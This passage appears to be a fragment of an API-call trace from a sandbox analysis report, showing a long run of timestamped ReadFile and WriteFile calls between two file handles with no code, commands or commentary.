nNumberOfBytesToWrite=0xf9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.293] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.294] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.294] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.295] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x9d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.295] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.296] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.296] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.297] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x19, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.297] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.298] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.298] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.299] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x114, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.299] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.300] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.301] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.301] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.301] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.302] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.302] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.303] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x11d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.303] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.304] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.305] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.305] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x72, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.305] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.306] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.307] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.307] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x45, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.308] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.308] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.309] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.309] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.309] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.310] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.311] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x37d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.311] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.312] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.312] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.313] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xaa, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.313] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.314] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.314] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.315] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.315] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.316] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.316] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xc6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.317] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.317] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.318] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1ba, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.318] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.319] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.319] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.320] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x93, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.320] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.321] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.321] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.322] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xd1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.322] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.323] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.323] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.324] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.324] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.325] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.325] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.326] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x7c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.326] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.327] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.328] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.328] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.328] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.329] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.330] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x39, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.330] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.330] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.331] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.331] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x79, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.332] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.332] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.333] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.333] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.334] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.334] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.335] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.335] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.336] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x297, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.336] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.337] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x373, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.337] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.338] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x36c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.338] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.339] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x361, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.340] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.340] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.341] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.341] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.342] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.342] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.343] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x15d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.344] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, 